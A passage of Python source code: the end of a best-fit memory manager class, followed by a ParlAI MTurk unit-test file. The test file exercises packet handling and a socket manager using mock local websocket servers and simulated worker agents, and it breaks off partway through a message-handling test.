        :return: the chosen Block's address attribute, or None
        """
        process_size = process.size
        best_position = None
        # Track the smallest size gap seen so far. BUGFIX: start at infinity
        # instead of the arbitrary sentinel 1000, which wrongly rejected
        # fitting blocks whose gap happened to be 1000 or more.
        distance = float('inf')
        for i in range(len(self.memory)):
            block_size = self.memory[i].size['available']
            gap = abs(block_size - process_size)
            # A candidate must both fit and be closer than the current best.
            if gap < distance and block_size >= process_size:
                best_position = i
                distance = gap
        if best_position is not None:
            return self.memory[best_position].address
        support.ERRORS.append("[Warning] Could not find an available space for process {0}.".format(process.pid))

    def alloc(self, obj):
        """Allocate a Process into the best-fitting block.

        :param obj: a Process object
        :return: the Block address the process was allocated at, or None
        """
        address = self.best_fit(obj)
        if address is not None:
            # alloc_in runs in a worker thread that is joined immediately,
            # so the call is effectively synchronous.
            my_thread = Thread(target=self.alloc_in, args=(obj, address))
            my_thread.start()
            my_thread.join()
            return address

    def free(self, address):
        """Release every process held by the block at `address`.

        BUGFIX: previously this only looked the block up and discarded the
        result, freeing nothing. Now it clears the block's content and
        restores its full available size. Unknown addresses are ignored.

        :param address: the Address attribute of the block to clean
        :return: void
        """
        block = self.get_block(address)
        if block is not None:
            block.content = []
            block.size['available'] = block.size['total']

    def show(self, address=None):
        """Return a printable view of one block, or of the whole memory.

        :param address: [Optional] Address attribute of a specific Block
        :return: dict for a single block, list of dicts for the whole
                 memory, or None when the requested address does not exist
        """
        if address:
            try:
                return MemoryManager.__listing_style(self.get_block(address))
            except AttributeError:
                # Unknown address: get_block returned None.
                return None
        return [MemoryManager.__listing_style(block) for block in self.memory]
|
test_socket_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
from unittest import mock
from parlai.mturk.core.dev.socket_manager import Packet, SocketManager
from parlai.mturk.core.dev.agents import AssignState
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
# Identifiers for two fake workers / assignments / HITs used across tests.
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
# Canned message/command payloads exchanged through the socket manager.
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_ACT
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
# Assignment statuses grouped into "still working" vs "finished" buckets.
active_statuses = [
    AssignState.STATUS_NONE,
    AssignState.STATUS_ONBOARDING,
    AssignState.STATUS_WAITING,
    AssignState.STATUS_IN_TASK,
]
complete_statuses = [
    AssignState.STATUS_DONE,
    AssignState.STATUS_DISCONNECT,
    AssignState.STATUS_PARTNER_DISCONNECT,
    AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
    AssignState.STATUS_EXPIRED,
    AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
# Shrink the manager's timeouts so disconnect/death detection happens
# quickly enough for unit tests.
SocketManager.DEF_MISSED_PONGS = 3
SocketManager.DEF_DEAD_TIME = 0.6
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
class TestPacket(unittest.TestCase):
    """
    Various unit tests for the Packet class.
    """

    # Fixed field values reused by every packet fixture below.
    ID = 'ID'
    SENDER_ID = 'SENDER_ID'
    RECEIVER_ID = 'RECEIVER_ID'
    ASSIGNMENT_ID = 'ASSIGNMENT_ID'
    DATA = 'DATA'
    CONVERSATION_ID = 'CONVERSATION_ID'
    ACK_FUNCTION = 'ACK_FUNCTION'
    def setUp(self):
        # packet_1: fully-populated message-batch packet (has conversation
        # id and ack function); packet_2/packet_3 exercise the defaults.
        self.packet_1 = Packet(
            self.ID,
            data_model.MESSAGE_BATCH,
            self.SENDER_ID,
            self.RECEIVER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
            conversation_id=self.CONVERSATION_ID,
            ack_func=self.ACK_FUNCTION,
        )
        self.packet_2 = Packet(
            self.ID,
            data_model.SNS_MESSAGE,
            self.SENDER_ID,
            self.RECEIVER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
        )
        self.packet_3 = Packet(
            self.ID,
            data_model.AGENT_ALIVE,
            self.SENDER_ID,
            self.RECEIVER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
        )
    def tearDown(self):
        pass
    def test_packet_init(self):
        """
        Test proper initialization of packet fields.
        """
        self.assertEqual(self.packet_1.id, self.ID)
        self.assertEqual(self.packet_1.type, data_model.MESSAGE_BATCH)
        self.assertEqual(self.packet_1.sender_id, self.SENDER_ID)
        self.assertEqual(self.packet_1.receiver_id, self.RECEIVER_ID)
        self.assertEqual(self.packet_1.assignment_id, self.ASSIGNMENT_ID)
        self.assertEqual(self.packet_1.data, self.DATA)
        self.assertEqual(self.packet_1.conversation_id, self.CONVERSATION_ID)
        self.assertEqual(self.packet_1.ack_func, self.ACK_FUNCTION)
        self.assertEqual(self.packet_1.status, Packet.STATUS_INIT)
        # packet_2/packet_3 omitted the optional kwargs, so conversation_id
        # and ack_func must default to None.
        self.assertEqual(self.packet_2.id, self.ID)
        self.assertEqual(self.packet_2.type, data_model.SNS_MESSAGE)
        self.assertEqual(self.packet_2.sender_id, self.SENDER_ID)
        self.assertEqual(self.packet_2.receiver_id, self.RECEIVER_ID)
        self.assertEqual(self.packet_2.assignment_id, self.ASSIGNMENT_ID)
        self.assertEqual(self.packet_2.data, self.DATA)
        self.assertIsNone(self.packet_2.conversation_id)
        self.assertIsNone(self.packet_2.ack_func)
        self.assertEqual(self.packet_2.status, Packet.STATUS_INIT)
        self.assertEqual(self.packet_3.id, self.ID)
        self.assertEqual(self.packet_3.type, data_model.AGENT_ALIVE)
        self.assertEqual(self.packet_3.sender_id, self.SENDER_ID)
        self.assertEqual(self.packet_3.receiver_id, self.RECEIVER_ID)
        self.assertEqual(self.packet_3.assignment_id, self.ASSIGNMENT_ID)
        self.assertEqual(self.packet_3.data, self.DATA)
        self.assertIsNone(self.packet_3.conversation_id)
        self.assertIsNone(self.packet_3.ack_func)
        self.assertEqual(self.packet_3.status, Packet.STATUS_INIT)
    def test_dict_conversion(self):
        """
        Ensure packets can be converted to and from a representative dict.
        """
        converted_packet = Packet.from_dict(self.packet_1.as_dict())
        self.assertEqual(self.packet_1.id, converted_packet.id)
        self.assertEqual(self.packet_1.type, converted_packet.type)
        self.assertEqual(self.packet_1.sender_id, converted_packet.sender_id)
        self.assertEqual(self.packet_1.receiver_id, converted_packet.receiver_id)
        self.assertEqual(self.packet_1.assignment_id, converted_packet.assignment_id)
        self.assertEqual(self.packet_1.data, converted_packet.data)
        self.assertEqual(
            self.packet_1.conversation_id, converted_packet.conversation_id
        )
        # Round-tripping a dict through from_dict/as_dict must be lossless.
        packet_dict = self.packet_1.as_dict()
        self.assertDictEqual(packet_dict, Packet.from_dict(packet_dict).as_dict())
    def test_connection_ids(self):
        """
        Ensure that connection ids are reported as we expect them.
        """
        # Connection ids are '<agent id>_<assignment id>'.
        sender_conn_id = '{}_{}'.format(self.SENDER_ID, self.ASSIGNMENT_ID)
        receiver_conn_id = '{}_{}'.format(self.RECEIVER_ID, self.ASSIGNMENT_ID)
        self.assertEqual(self.packet_1.get_sender_connection_id(), sender_conn_id)
        self.assertEqual(self.packet_1.get_receiver_connection_id(), receiver_conn_id)
    def test_packet_conversions(self):
        """
        Ensure that packet copies and acts are produced properly.
        """
        # Copy important packet
        # A copy keeps every routing/data field but gets a fresh id, a
        # cleared ack_func, and INIT status.
        message_packet_copy = self.packet_1.new_copy()
        self.assertNotEqual(message_packet_copy.id, self.ID)
        self.assertNotEqual(message_packet_copy, self.packet_1)
        self.assertEqual(message_packet_copy.type, self.packet_1.type)
        self.assertEqual(message_packet_copy.sender_id, self.packet_1.sender_id)
        self.assertEqual(message_packet_copy.receiver_id, self.packet_1.receiver_id)
        self.assertEqual(message_packet_copy.assignment_id, self.packet_1.assignment_id)
        self.assertEqual(message_packet_copy.data, self.packet_1.data)
        self.assertEqual(
            message_packet_copy.conversation_id, self.packet_1.conversation_id
        )
        self.assertIsNone(message_packet_copy.ack_func)
        self.assertEqual(message_packet_copy.status, Packet.STATUS_INIT)
        # Copy non-important packet
        hb_packet_copy = self.packet_2.new_copy()
        self.assertNotEqual(hb_packet_copy.id, self.ID)
        self.assertNotEqual(hb_packet_copy, self.packet_2)
        self.assertEqual(hb_packet_copy.type, self.packet_2.type)
        self.assertEqual(hb_packet_copy.sender_id, self.packet_2.sender_id)
        self.assertEqual(hb_packet_copy.receiver_id, self.packet_2.receiver_id)
        self.assertEqual(hb_packet_copy.assignment_id, self.packet_2.assignment_id)
        self.assertEqual(hb_packet_copy.data, self.packet_2.data)
        self.assertEqual(hb_packet_copy.conversation_id, self.packet_2.conversation_id)
        self.assertIsNone(hb_packet_copy.ack_func)
        self.assertEqual(hb_packet_copy.status, Packet.STATUS_INIT)
    def test_packet_modifications(self):
        """
        Ensure that packet copies and acts are produced properly.
        """
        # All operations return the packet
        self.assertEqual(self.packet_1.swap_sender(), self.packet_1)
        self.assertEqual(
            self.packet_1.set_type(data_model.MESSAGE_BATCH), self.packet_1
        )
        self.assertEqual(self.packet_1.set_data(None), self.packet_1)
        # Ensure all of the operations worked
        self.assertEqual(self.packet_1.sender_id, self.RECEIVER_ID)
        self.assertEqual(self.packet_1.receiver_id, self.SENDER_ID)
        self.assertEqual(self.packet_1.type, data_model.MESSAGE_BATCH)
        self.assertIsNone(self.packet_1.data)
class MockSocket:
    """
    Stand-in for the MTurk routing server used by these tests.

    Runs a local ``WebsocketServer`` on a background daemon thread and
    answers the minimal protocol a ``SocketManager`` needs: it ACKs a
    WORLD_ALIVE with ``conn_success`` and answers WORLD_PING with a
    SERVER_PONG.  Incoming content is additionally routed to per-receiver
    handlers registered in ``self.handlers``.
    """

    def __init__(self):
        self.last_messages = {}
        self.connected = False      # set once a WORLD_ALIVE packet arrives
        self.disconnected = False   # set when any client disconnects
        self.closed = False
        self.ws = None
        self.fake_workers = []
        self.port = None            # filled in by the server thread
        self.launch_socket()
        self.handlers = {}          # receiver_id -> callable(content_dict)
        # Busy-wait until the background thread has constructed the server,
        # then give it a moment to start accepting connections.
        while self.ws is None:
            time.sleep(0.05)
        time.sleep(1)

    def send(self, packet):
        # Broadcast a raw (already-serialized) payload to every client.
        self.ws.send_message_to_all(packet)

    def close(self):
        # Idempotent shutdown of the underlying websocket server.
        if not self.closed:
            self.ws.server_close()
            self.ws.shutdown()
            self.closed = True

    def do_nothing(self, *args):
        # Default handler for receivers nobody registered for.
        pass

    def launch_socket(self):
        """Start the websocket server on a daemon thread, picking the first
        free port at or above 3030."""

        def on_message(client, server, message):
            if self.closed:
                raise Exception('Socket is already closed...')
            if message == '':
                return
            packet_dict = json.loads(message)
            if packet_dict['content']['id'] == 'WORLD_ALIVE':
                # Acknowledge the world's registration handshake.
                self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
                self.connected = True
            elif packet_dict['type'] == data_model.WORLD_PING:
                # Answer heartbeats so the SocketManager stays "alive".
                pong = packet_dict['content'].copy()
                pong['type'] = 'pong'
                self.ws.send_message(
                    client,
                    json.dumps({'type': data_model.SERVER_PONG, 'content': pong}),
                )
            # Route addressed content to any registered test handler.
            if 'receiver_id' in packet_dict['content']:
                receiver_id = packet_dict['content']['receiver_id']
                use_func = self.handlers.get(receiver_id, self.do_nothing)
                use_func(packet_dict['content'])

        def on_connect(client, server):
            pass

        def on_disconnect(client, server):
            self.disconnected = True

        def run_socket(*args):
            # Retry on OSError (port in use) by walking up from 3030;
            # self.port doubles as the "successfully bound" flag.
            port = 3030
            while self.port is None:
                try:
                    self.ws = WebsocketServer(port, host='127.0.0.1')
                    self.port = port
                except OSError:
                    port += 1
            self.ws.set_fn_client_left(on_disconnect)
            self.ws.set_fn_new_client(on_connect)
            self.ws.set_fn_message_received(on_message)
            self.ws.run_forever()

        self.listen_thread = threading.Thread(
            target=run_socket, name='Fake-Socket-Thread'
        )
        self.listen_thread.daemon = True
        self.listen_thread.start()
class MockAgent(object):
    """
    Class that pretends to be an MTurk agent interacting through the webpage by
    simulating the same commands that are sent from the core.html file.
    Exposes methods to use for testing and checking status.
    """

    def __init__(self, hit_id, assignment_id, worker_id, task_group_id):
        self.conversation_id = None
        self.id = None
        self.assignment_id = assignment_id
        self.hit_id = hit_id
        self.worker_id = worker_id
        self.some_agent_disconnected = False
        self.disconnected = False
        self.task_group_id = task_group_id
        self.ws = None          # MockSocket, set by register_to_socket
        self.ready = False
        self.wants_to_send = False

    def send_packet(self, packet):
        """Broadcast a pre-built Packet through the fake socket as a
        MESSAGE_BATCH event."""
        # (A dead no-op `callback` closure was removed here; it was never
        # referenced.)
        event_name = data_model.MESSAGE_BATCH
        self.ws.send(json.dumps({'type': event_name, 'content': packet.as_dict()}))

    def register_to_socket(self, ws, on_msg):
        """Attach this agent to a MockSocket, routing packets addressed to
        this worker_id into the given on_msg callback."""
        handler = self.make_packet_handler(on_msg)
        self.ws = ws
        self.ws.handlers[self.worker_id] = handler

    def make_packet_handler(self, on_msg):
        """
        A packet handler.

        Returns a callable that converts incoming content dicts into Packet
        objects for WORLD_MESSAGE / MESSAGE_BATCH, and raises on anything
        else (agents should never receive ALIVE or unknown packet types).
        """

        def handler_mock(pkt):
            if pkt['type'] == data_model.WORLD_MESSAGE:
                packet = Packet.from_dict(pkt)
                on_msg(packet)
            elif pkt['type'] == data_model.MESSAGE_BATCH:
                packet = Packet.from_dict(pkt)
                on_msg(packet)
            elif pkt['type'] == data_model.AGENT_ALIVE:
                raise Exception('Invalid alive packet {}'.format(pkt))
            else:
                raise Exception(
                    'Invalid Packet type {} received in {}'.format(pkt['type'], pkt)
                )

        return handler_mock

    def build_and_send_packet(self, packet_type, data):
        """Assemble a packet dict addressed to the world and send it through
        the fake socket. Returns the generated message id."""
        msg_id = str(uuid.uuid4())
        msg = {
            'id': msg_id,
            'type': packet_type,
            'sender_id': self.worker_id,
            'assignment_id': self.assignment_id,
            'conversation_id': self.conversation_id,
            'receiver_id': '[World_' + self.task_group_id + ']',
            'data': data,
        }
        if packet_type == data_model.MESSAGE_BATCH:
            # Batches wrap the single message in a `messages` list, mirroring
            # what core.html sends.
            msg['data'] = {
                'messages': [
                    {
                        'id': msg_id,
                        'type': packet_type,
                        'sender_id': self.worker_id,
                        'assignment_id': self.assignment_id,
                        'conversation_id': self.conversation_id,
                        'receiver_id': '[World_' + self.task_group_id + ']',
                        'data': data,
                    }
                ]
            }
        self.ws.send(json.dumps({'type': packet_type, 'content': msg}))
        return msg['id']

    def send_message(self, text):
        """Simulate the worker sending a chat message; returns its id."""
        data = {
            'text': text,
            'id': self.id,
            'message_id': str(uuid.uuid4()),
            'episode_done': False,
        }
        self.wants_to_send = False
        return self.build_and_send_packet(data_model.MESSAGE_BATCH, data)

    def send_disconnect(self):
        """Simulate the worker disconnecting from the task."""
        data = {
            'hit_id': self.hit_id,
            'assignment_id': self.assignment_id,
            'worker_id': self.worker_id,
            'conversation_id': self.conversation_id,
            'connection_id': '{}_{}'.format(self.worker_id, self.assignment_id),
        }
        return self.build_and_send_packet(data_model.AGENT_DISCONNECT, data)

    def send_alive(self):
        """Simulate the worker's initial alive handshake."""
        data = {
            'hit_id': self.hit_id,
            'assignment_id': self.assignment_id,
            'worker_id': self.worker_id,
            'conversation_id': self.conversation_id,
        }
        return self.build_and_send_packet(data_model.AGENT_ALIVE, data)
class TestSocketManagerSetupAndFunctions(unittest.TestCase):
    """
    Unit/integration tests for starting up a socket.

    Each test boots a MockSocket server, connects a SocketManager to it, and
    exercises the connect / shutdown / reconnect / dead-server paths.
    """

    def setUp(self):
        self.fake_socket = MockSocket()
        time.sleep(1)  # let the server thread come up before connecting

    def tearDown(self):
        self.fake_socket.close()

    def test_init_and_reg_shutdown(self):
        """
        Test initialization of a socket manager.
        """
        self.assertFalse(self.fake_socket.connected)

        # Callbacks should never trigger during proper setup and shutdown
        nop_called = False

        def nop(*args):
            nonlocal nop_called  # noqa 999 we don't support py2
            nop_called = True

        socket_manager = SocketManager(
            'https://127.0.0.1',
            self.fake_socket.port,
            nop,
            nop,
            nop,
            TASK_GROUP_ID_1,
            0.3,
            nop,
        )
        self.assertTrue(self.fake_socket.connected)
        self.assertFalse(nop_called)

        # Test shutdown
        self.assertFalse(self.fake_socket.disconnected)
        self.assertFalse(socket_manager.is_shutdown)
        self.assertTrue(socket_manager.alive)
        socket_manager.shutdown()
        time.sleep(0.3)
        self.assertTrue(self.fake_socket.disconnected)
        self.assertTrue(socket_manager.is_shutdown)
        self.assertFalse(nop_called)

    def assertEqualBy(self, val_func, val, max_time):
        """Poll val_func every 0.1s until it returns val, failing after
        max_time seconds."""
        start_time = time.time()
        while val_func() != val:
            assert time.time() - start_time < max_time, (
                "Value was not attained in specified time, was {} rather "
                "than {}".format(val_func(), val)
            )
            time.sleep(0.1)

    def test_init_and_socket_shutdown(self):
        """
        Test initialization of a socket manager with a failed shutdown.
        """
        self.assertFalse(self.fake_socket.connected)

        # Callbacks should never trigger during proper setup and shutdown
        nop_called = False

        def nop(*args):
            nonlocal nop_called  # noqa 999 we don't support py2
            nop_called = True

        server_death_called = False

        def server_death(*args):
            nonlocal server_death_called
            server_death_called = True

        socket_manager = SocketManager(
            'https://127.0.0.1',
            self.fake_socket.port,
            nop,
            nop,
            nop,
            TASK_GROUP_ID_1,
            0.4,
            server_death,
        )
        self.assertTrue(self.fake_socket.connected)
        self.assertFalse(nop_called)
        self.assertFalse(server_death_called)

        # Killing the server (not the manager) must eventually fire the
        # server-death callback.
        self.assertFalse(self.fake_socket.disconnected)
        self.assertFalse(socket_manager.is_shutdown)
        self.assertTrue(socket_manager.alive)
        self.fake_socket.close()
        self.assertEqualBy(lambda: socket_manager.alive, False, 8)
        self.assertEqualBy(lambda: server_death_called, True, 20)
        self.assertFalse(nop_called)
        socket_manager.shutdown()

    def test_init_and_socket_shutdown_then_restart(self):
        """
        Test restoring connection to a socket.
        """
        self.assertFalse(self.fake_socket.connected)

        # Callbacks should never trigger during proper setup and shutdown
        nop_called = False

        def nop(*args):
            nonlocal nop_called  # noqa 999 we don't support py2
            nop_called = True

        server_death_called = False

        def server_death(*args):
            nonlocal server_death_called
            server_death_called = True

        socket_manager = SocketManager(
            'https://127.0.0.1',
            self.fake_socket.port,
            nop,
            nop,
            nop,
            TASK_GROUP_ID_1,
            0.4,
            server_death,
        )
        self.assertTrue(self.fake_socket.connected)
        self.assertFalse(nop_called)
        self.assertFalse(server_death_called)

        # Drop the server, then bring up a fresh one: the manager should
        # reconnect on its own without declaring server death.
        self.assertFalse(self.fake_socket.disconnected)
        self.assertFalse(socket_manager.is_shutdown)
        self.assertTrue(socket_manager.alive)
        self.fake_socket.close()
        self.assertEqualBy(lambda: socket_manager.alive, False, 8)
        self.assertFalse(socket_manager.alive)
        self.fake_socket = MockSocket()
        self.assertEqualBy(lambda: socket_manager.alive, True, 4)
        self.assertFalse(nop_called)
        self.assertFalse(server_death_called)
        socket_manager.shutdown()

    def test_init_world_dead(self):
        """
        Test initialization of a socket manager with a failed startup.
        """
        self.assertFalse(self.fake_socket.connected)
        self.fake_socket.close()

        # Callbacks should never trigger during proper setup and shutdown
        nop_called = False

        def nop(*args):
            nonlocal nop_called  # noqa 999 we don't support py2
            nop_called = True

        server_death_called = False

        def server_death(*args):
            nonlocal server_death_called
            server_death_called = True

        # BUGFIX: pre-bind socket_manager. The assignment inside the
        # assertRaises block never completes (the constructor raises), so
        # without this the assertIsNone below raised NameError instead of
        # checking anything.
        socket_manager = None
        with self.assertRaises(ConnectionRefusedError):
            socket_manager = SocketManager(
                'https://127.0.0.1',
                self.fake_socket.port,
                nop,
                nop,
                nop,
                TASK_GROUP_ID_1,
                0.4,
                server_death,
            )

        self.assertIsNone(socket_manager)
        self.assertFalse(nop_called)
        self.assertTrue(server_death_called)
class TestSocketManagerRoutingFunctionality(unittest.TestCase):
    """
    Tests for SocketManager's packet routing: initial state, packet sends,
    and per-worker channel open/close bookkeeping.
    """

    # Fixed identifiers reused across the packet fixtures below.
    ID = 'ID'
    SENDER_ID = 'SENDER_ID'
    ASSIGNMENT_ID = 'ASSIGNMENT_ID'
    DATA = 'DATA'
    CONVERSATION_ID = 'CONVERSATION_ID'
    ACK_FUNCTION = 'ACK_FUNCTION'
    WORLD_ID = '[World_{}]'.format(TASK_GROUP_ID_1)

    # --- SocketManager callbacks: each just records what it was given ---

    def on_alive(self, packet):
        self.alive_packet = packet

    def on_message(self, packet):
        self.message_packet = packet

    def on_worker_death(self, worker_id, assignment_id):
        self.dead_worker_id = worker_id
        self.dead_assignment_id = assignment_id

    def on_server_death(self):
        self.server_died = True

    def setUp(self):
        # Canned packets used by the routing tests.
        self.AGENT_ALIVE_PACKET = Packet(
            MESSAGE_ID_1,
            data_model.AGENT_ALIVE,
            self.SENDER_ID,
            self.WORLD_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
            self.CONVERSATION_ID,
        )
        self.MESSAGE_SEND_PACKET_1 = Packet(
            MESSAGE_ID_2,
            data_model.WORLD_MESSAGE,
            self.WORLD_ID,
            self.SENDER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
            self.CONVERSATION_ID,
        )
        self.MESSAGE_SEND_PACKET_2 = Packet(
            MESSAGE_ID_3,
            data_model.MESSAGE_BATCH,
            self.WORLD_ID,
            self.SENDER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
            self.CONVERSATION_ID,
        )
        self.MESSAGE_SEND_PACKET_3 = Packet(
            MESSAGE_ID_4,
            data_model.MESSAGE_BATCH,
            self.WORLD_ID,
            self.SENDER_ID,
            self.ASSIGNMENT_ID,
            self.DATA,
            self.CONVERSATION_ID,
        )

        self.fake_socket = MockSocket()
        time.sleep(0.3)
        # Callback capture slots, reset per test.
        self.alive_packet = None
        self.message_packet = None
        self.dead_worker_id = None
        self.dead_assignment_id = None
        self.server_died = False

        self.socket_manager = SocketManager(
            'https://127.0.0.1',
            self.fake_socket.port,
            self.on_alive,
            self.on_message,
            self.on_worker_death,
            TASK_GROUP_ID_1,
            1,
            self.on_server_death,
        )

    def tearDown(self):
        self.socket_manager.shutdown()
        self.fake_socket.close()

    def test_init_state(self):
        """
        Ensure all of the initial state of the socket_manager is ready.
        """
        self.assertEqual(self.socket_manager.server_url, 'https://127.0.0.1')
        self.assertEqual(self.socket_manager.port, self.fake_socket.port)
        self.assertEqual(self.socket_manager.alive_callback, self.on_alive)
        self.assertEqual(self.socket_manager.message_callback, self.on_message)
        self.assertEqual(self.socket_manager.socket_dead_callback, self.on_worker_death)
        self.assertEqual(self.socket_manager.task_group_id, TASK_GROUP_ID_1)
        self.assertEqual(
            self.socket_manager.missed_pongs, 1 + (1 / SocketManager.PING_RATE)
        )
        self.assertIsNotNone(self.socket_manager.ws)
        self.assertTrue(self.socket_manager.keep_running)
        self.assertIsNotNone(self.socket_manager.listen_thread)
        self.assertSetEqual(self.socket_manager.open_channels, set())
        self.assertDictEqual(self.socket_manager.packet_map, {})
        self.assertTrue(self.socket_manager.alive)
        self.assertFalse(self.socket_manager.is_shutdown)
        self.assertEqual(self.socket_manager.get_my_sender_id(), self.WORLD_ID)

    def _send_packet_in_background(self, packet, send_time):
        """
        creates a thread to handle waiting for a packet send.
        """

        def do_send():
            self.socket_manager._send_packet(packet, send_time)
            self.sent = True

        send_thread = threading.Thread(target=do_send, daemon=True)
        send_thread.start()
        # Short pause so the send thread runs before the caller asserts.
        time.sleep(0.02)

    def test_packet_send(self):
        """
        Checks to see if packets are working.
        """
        # Stub out the wire send so we can inspect exactly what went out.
        self.socket_manager._safe_send = mock.MagicMock()
        self.sent = False

        # Test a blocking acknowledged packet
        send_time = time.time()
        self.assertEqual(self.MESSAGE_SEND_PACKET_2.status, Packet.STATUS_INIT)
        self._send_packet_in_background(self.MESSAGE_SEND_PACKET_2, send_time)
        self.assertEqual(self.MESSAGE_SEND_PACKET_2.status, Packet.STATUS_SENT)
        self.socket_manager._safe_send.assert_called_once()
        self.assertTrue(self.sent)

        # The serialized payload should round-trip back to the packet dict.
        used_packet_json = self.socket_manager._safe_send.call_args[0][0]
        used_packet_dict = json.loads(used_packet_json)
        self.assertEqual(used_packet_dict['type'], data_model.MESSAGE_BATCH)
        self.assertDictEqual(
            used_packet_dict['content'], self.MESSAGE_SEND_PACKET_2.as_dict()
        )

    def test_simple_packet_channel_management(self):
        """
        Ensure that channels are created, managed, and then removed as expected.
        """
        use_packet = self.MESSAGE_SEND_PACKET_1
        worker_id = use_packet.receiver_id
        assignment_id = use_packet.assignment_id

        # Open a channel and assert it is there
        self.socket_manager.open_channel(worker_id, assignment_id)
        time.sleep(0.1)
        connection_id = use_packet.get_receiver_connection_id()
        self.assertIn(connection_id, self.socket_manager.open_channels)
        self.assertTrue(self.socket_manager.socket_is_open(connection_id))
        self.assertFalse(self.socket_manager.socket_is_open(FAKE_ID))

        # Send a packet to an open socket, ensure it got queued
        resp = self.socket_manager.queue_packet(use_packet)
        self.assertIn(use_packet.id, self.socket_manager.packet_map)
        self.assertTrue(resp)

        # Assert we can get the status of a packet in the map, but not
        # existing doesn't throw an error
        self.assertEqual(
            self.socket_manager.get_status(use_packet.id), use_packet.status
        )
        self.assertEqual(self.socket_manager.get_status(FAKE_ID), Packet.STATUS_NONE)

        # Assert that closing a thread does the correct cleanup work
        self.socket_manager.close_channel(connection_id)
        time.sleep(0.2)
        self.assertNotIn(connection_id, self.socket_manager.open_channels)
        self.assertNotIn(use_packet.id, self.socket_manager.packet_map)

        # Assert that opening multiple and closing them is possible
        self.socket_manager.open_channel(worker_id, assignment_id)
        self.socket_manager.open_channel(worker_id + '2', assignment_id)
        time.sleep(0.1)
        self.assertEqual(len(self.socket_manager.open_channels), 2)
        self.socket_manager.close_all_channels()
        time.sleep(0.1)
        self.assertEqual(len(self.socket_manager.open_channels), 0)
class TestSocketManagerMessageHandling(unittest.TestCase):
    """
    Test sending messages to the world and then to each of two agents, along with
    failure cases for each.
    """

    # --- SocketManager callbacks: each records what it was given ---

    def on_alive(self, packet):
        self.alive_packet = packet
        # Open a return channel so the world can message this agent back.
        self.socket_manager.open_channel(packet.sender_id, packet.assignment_id)

    def on_message(self, packet):
        self.message_packet = packet

    def on_worker_death(self, worker_id, assignment_id):
        self.dead_worker_id = worker_id
        self.dead_assignment_id = assignment_id

    def on_server_death(self):
        self.server_died = True

    def assertEqualBy(self, val_func, val, max_time):
        """Poll val_func every 0.1s until it returns val, failing after
        max_time seconds."""
        start_time = time.time()
        while val_func() != val:
            assert (
                time.time() - start_time < max_time
            ), "Value was not attained in specified time"
            time.sleep(0.1)

    def setUp(self):
        self.fake_socket = MockSocket()
        time.sleep(0.3)
        self.agent1 = MockAgent(
            TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1, TASK_GROUP_ID_1
        )
        self.agent2 = MockAgent(
            TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2, TEST_WORKER_ID_2, TASK_GROUP_ID_1
        )
        # Callback capture slots, reset per test.
        self.alive_packet = None
        self.message_packet = None
        self.dead_worker_id = None
        self.dead_assignment_id = None
        self.server_died = False

        # BUGFIX: use the port MockSocket actually bound instead of the
        # hard-coded 3030. MockSocket walks up from 3030 when the port is
        # busy, so the hard-coded value could point the manager at nothing.
        # This also matches the other test classes in this file.
        self.socket_manager = SocketManager(
            'https://127.0.0.1',
            self.fake_socket.port,
            self.on_alive,
            self.on_message,
            self.on_worker_death,
            TASK_GROUP_ID_1,
            1,
            self.on_server_death,
        )

    def tearDown(self):
        self.socket_manager.shutdown()
        self.fake_socket.close()

    def test_alive_send_and_disconnect(self):
        """World receives an alive, exchanges messages with the agent, then
        observes the agent's disconnect."""
        message_packet = None

        def on_msg(*args):
            nonlocal message_packet
            message_packet = args[0]

        self.agent1.register_to_socket(self.fake_socket, on_msg)
        self.assertIsNone(message_packet)

        # Assert alive is registered
        alive_id = self.agent1.send_alive()
        self.assertIsNone(message_packet)
        self.assertIsNone(self.message_packet)
        self.assertEqualBy(lambda: self.alive_packet is None, False, 8)
        self.assertEqual(self.alive_packet.id, alive_id)

        # Test message send from agent
        test_message_text_1 = 'test_message_text_1'
        msg_id = self.agent1.send_message(test_message_text_1)
        self.assertEqualBy(lambda: self.message_packet is None, False, 8)
        self.assertEqual(self.message_packet.id, msg_id)
        self.assertEqual(self.message_packet.data['text'], test_message_text_1)

        # Test message send to agent
